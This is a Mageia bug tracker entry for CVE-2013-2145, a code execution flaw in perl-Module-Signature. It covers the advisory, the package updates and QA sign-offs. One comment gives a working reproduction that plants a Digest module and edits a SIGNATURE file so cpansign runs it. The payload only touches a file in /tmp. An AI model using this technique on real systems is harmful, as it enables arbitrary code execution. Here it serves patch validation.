Bug 10558 - perl-Module-Signature new security issue CVE-2013-2145
: perl-Module-Signature new security issue CVE-2013-2145
Status: RESOLVED FIXED
Product: Mageia
Classification: Unclassified
Component: Security
: 3
: i586 Linux
: Normal Severity: major
: ---
Assigned To: QA Team
: Sec team
: http://lwn.net/Vulnerabilities/555218/
: MGA2TOO has_procedure MGA2-32-OK MGA2...
: validated_update
:
:
  Show dependency treegraph
 
Reported: 2013-06-18 18:51 CEST by David Walser
Modified: 2014-05-08 18:07 CEST (History)
3 users (show)

See Also:
Source RPM: perl-Module-Signature-0.690.0-1.mga3.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2013-06-18 18:51:36 CEST
Fedora has issued an advisory on June 9:
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html

Mageia 2 and Mageia 3 are also affected.

Reproducible: 

Steps to Reproduce:
Comment 1 Shlomi Fish 2013-06-18 19:32:35 CEST
Hi David,

thanks for the report. Updates pushed to Mageia 2, Mageia 3 and Mageia Cauldron:

http://pkgsubmit.mageia.org/

Regards,

-- Shlomi Fish
Comment 2 David Walser 2013-06-18 20:15:22 CEST
Thanks Shlomi!

If anyone wants to provide a more descriptive CVE summary, feel free :o)

More info is here:
http://openwall.com/lists/oss-security/2013/06/05/16

Advisory:
========================

Updated perl-Module-Signature package fixes security vulnerability:

Arbitrary code execution vulnerability in Module::Signature before 0.72
(CVE-2013-2145).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2145
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html
========================

Updated packages in core/updates_testing:
========================
perl-Module-Signature-0.730.0-1.mga2
perl-Module-Signature-0.730.0-1.mga3

from SRPMS:
perl-Module-Signature-0.730.0-1.mga2.src.rpm
perl-Module-Signature-0.730.0-1.mga3.src.rpm
Comment 3 Samuel Verschelde 2013-06-25 15:02:31 CEST
Testing complete MGA2 x86_64

Here is my testing procedure:

As root:

1) install perl-Module-Signature
2) as root, create /usr/lib/perl5/vendor_perl/{your_version}/Digest/Special.pm

# cat Special.pm
system("touch /tmp/evilFile");

As a normal user:

1) make sure you already have a gpg key as your normal user, or create one with gpg --gen-key
2) rm -f /tmp/evilFile #justInCase
3) Then:
$ mkdir test-signature
$ cd test-signature
$ vim MANIFEST
$ cat MANIFEST
MANIFEST
$ cpansign sign
[...]
$ ls
MANIFEST  SIGNATURE
$ cat SIGNATURE 
This file contains message digests of all files listed in MANIFEST,
signed via the Module::Signature module, version 0.68.

To verify the content in this distribution, first make sure you have
Module::Signature installed, then type:

    % cpansign -v

It will check each file's integrity, as well as the signature's
validity.  If "==> Signature verified OK! <==" is not displayed,
the distribution may already have been compromised, and you should
not run its Makefile.PL or Build.PL.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
=lX23
-----END PGP SIGNATURE-----


Now we will alter this signature file, changing the "SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST" line

[samuel.verschelde@tech009 test-signature]$ vim SIGNATURE
[samuel.verschelde@tech009 test-signature]$ cat SIGNATURE
This file contains message digests of all files listed in MANIFEST,
signed via the Module::Signature module, version 0.68.

To verify the content in this distribution, first make sure you have
Module::Signature installed, then type:

    % cpansign -v

It will check each file's integrity, as well as the signature's
validity.  If "==> Signature verified OK! <==" is not displayed,
the distribution may already have been compromised, and you should
not run its Makefile.PL or Build.PL.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Special a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
=lX23
-----END PGP SIGNATURE-----

Now we run cpansign to verify the signature, thus tricking cpansign into executing our Special.pm evil script.

[samuel.verschelde@tech009 test-signature]$ cpansign
Unknown cipher: Special, please install Digest::Special
Can't call method "add" on an undefined value at /usr/lib/perl5/vendor_perl/5.12.3/Module/Signature.pm line 601, <F> chunk 1.

There are errors, because I haven't created a proper Special.rpm script, but this is enough for the test because:

[samuel.verschelde@tech009 test-signature]$ ls /tmp/evilFile
/tmp/evilFile

The evil action has worked.


Then install the update candidate, remove /tmp/evilFile, run cpansign again in the appropriate directory, see that it hasn't created the evilFile. Then don't forget to remove that Special.pm you created.

$ cpansign
Malformed algorithm name: Special (should match /\w+\d+/) at /usr/lib/perl5/vendor_perl/5.14.2/Module/Signature.pm line 541.
Comment 4 Rémi Verschelde 2013-06-25 17:25:04 CEST
Testing complete on Mageia 3 i586, following Stormi's procedure in comment 3.
That's nice for once, to be able to reproduce a security vulnerabity :)
Comment 5 Rémi Verschelde 2013-06-25 17:32:14 CEST
Testing complete on Mageia 2 i586.
Comment 6 claire robinson 2013-06-26 12:06:27 CEST
testing mga3 64
Comment 7 claire robinson 2013-06-26 12:35:31 CEST
Testing complete mga3 64

Thanks for the procedure Samuel.

Validating. Advisory uploaded.

Could sysadmin please push from 2 & 3 core/updates_testing to core/updates

Thanks!
Comment 8 Nicolas Vigier 2013-06-26 20:28:27 CEST
http://advisories.mageia.org/MGASA-2013-0184.html

Note You need to log in before you can comment on or make changes to this bug.